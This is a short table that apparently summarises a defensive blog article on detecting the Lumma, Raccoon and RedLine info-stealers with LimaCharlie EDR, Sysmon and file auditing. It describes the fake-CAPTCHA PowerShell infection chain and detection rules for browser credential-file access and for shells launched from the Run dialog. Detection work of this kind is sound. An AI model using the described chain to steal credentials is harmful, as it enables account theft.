| Aspect | Details |
|---|---|
| Info-Stealer Overview | Lumma, Raccoon, and RedLine target browser credentials, exploiting stored login data for unauthorized account access. |
| Lumma Infection Chain | Delivered via fake CAPTCHA pages using PowerShell scripts to execute malicious payloads, resulting in credential theft through browser data manipulation. |
| Simulation Setup | Tools: Kali Linux, Meterpreter payloads, LimaCharlie EDR, Sysmon. Configured file auditing and detection rules for browser paths. |
| File Auditing | Enabled via Windows group policy to monitor credential paths (Chrome, Edge) and generate Event ID 4663 for suspicious file access detection. |
| Registry Monitoring | Sysmon configured to track suspicious PowerShell or CMD activity from the “Run” feature by monitoring RunMRU registry keys. |
| Detection Rules | 1. Suspicious Browser Credential Access: Alerts on non-browser processes accessing sensitive credential files. |
| 2. Shell Invoked via Run: Detects PowerShell or CMD launched via Windows “Run” feature. | |
| Result | Enhanced detection through combined EDR, file auditing, and tailored logging rules, effectively identifying malicious activities linked to info-stealers. |
Read full article: https://medium.com/@atlas64/hunting-for-info-stealer-malware-limacharlie-edr-and-sysmon-c5c621fea74a
Disclaimer: The above summary has been generated by an AI language model
Leave a Reply